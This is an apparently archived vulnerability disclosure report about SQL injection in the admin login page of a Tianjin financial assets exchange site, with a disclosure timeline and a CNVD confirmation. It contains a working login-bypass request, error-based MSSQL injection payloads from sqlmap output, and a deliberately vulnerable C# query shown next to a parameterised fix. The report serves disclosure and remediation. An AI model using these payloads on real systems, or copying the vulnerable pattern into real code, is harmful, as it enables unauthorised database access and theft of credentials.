2015-10-31: Details reported to the vendor; awaiting vendor response
2015-11-04: Vendor confirmed; details disclosed to the vendor only
2015-11-14: Details disclosed to core white hats and experts in the relevant field
2015-11-24: Details disclosed to regular white hats
2015-12-04: Details disclosed to intern white hats
2015-12-19: Details disclosed to the public
SQL injection vulnerability in a site of the Tianjin Financial Assets Exchange
The admin backend has a SQL injection vulnerability: the database has 134 tables, the application runs with SA privileges, and the database users' hashes can be listed and cracked. Injection point:
POST /Login.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/Login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 436

__LASTFOCUS=&__EVENTTARGET=txtUserName&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTQyOTYwODY3Nw9kFgICAQ9kFgQCAQ8PFgIeBFRleHQFASdkZAIHDw8WAh8ABR7nmbvlvZXlkI3miJblr4bnoIHkuI3mraPnoa7vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ0luDn2ZN3vSlWPQi3pJB31Lq75HA40%3D&txtUserName=%27or%27%3D%27or%27&txtPassWord=1&ibtnLogIn.x=33&ibtnLogIn.y=6&__EVENTVALIDATION=%2FwEWBALS0PSPBwKl1bKzCQK1qbSWCwKBo5TKDiRy4XUvJXGk8eyNBaooo9d8phlb
Parameter: txtUserName (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=txtUserName&__EVENTARGUMENT=&__VIEWSTATE=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&txtUserName=-8832') OR 4454=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4454=4454) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(107)+CHAR(113))) AND ('VYtM'='VYtM&txtPassWord=1&ibtnLogIn.x=33&ibtnLogIn.y=6&__EVENTVALIDATION=/wEWBAKtqufXDAKl1bKzCQK1qbSWCwKBo5TKDuoowWxv3lzjCrWavsEoT32Xg+0X
    Vector: OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: nprtcm
134 tables:
Testing stopped at this point.
Fix: filter user input.
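The root cause behind both the hand-typed `'or'='or'` attempt and sqlmap's error-based finding is the same: the txtUserName value is spliced into the query text. Below is an added illustration of that login check in ASP.NET / ADO.NET next to its parameterised form; it is not code from the affected site, and the table and column names (S_User, UserName, PassWord) are assumed.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical login check behind a WebForms page with txtUserName / txtPassWord fields.
// Table and column names are assumed; they are not taken from the affected application.
public static class LoginCheck
{
    // VULNERABLE: the form values become part of the SQL text, so a quote in
    // txtUserName closes the literal and whatever follows is parsed as SQL.
    // This is the pattern an error-based tool detects through the SQL Server error text.
    public static bool LoginUnsafe(SqlConnection conn, string user, string pass)
    {
        string sql = "SELECT COUNT(*) FROM S_User WHERE UserName='" + user +
                     "' AND PassWord='" + pass + "'";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // HARDENED: same query with bound parameters. The values travel separately
    // from the statement, so quotes, OR and CONVERT() in the input are compared
    // as literal characters and are never interpreted as SQL.
    public static bool LoginSafe(SqlConnection conn, string user, string pass)
    {
        const string sql =
            "SELECT COUNT(*) FROM S_User WHERE UserName=@user AND PassWord=@pass";
        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 50).Value = user;
            cmd.Parameters.Add("@pass", SqlDbType.NVarChar, 50).Value = pass;
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}
```

Connecting the site with a low-privilege database login instead of sa limits what any remaining injection can reach, and enabling customErrors in web.config removes the verbose SQL Server error that error-based extraction relies on; neither replaces parameterisation.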
Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-04 14:33
CNVD confirmed and reproduced the described vulnerability and has handed it to CNCERT for forwarding to the corresponding branch center, which will coordinate remediation with the website's operating organization.
None yet.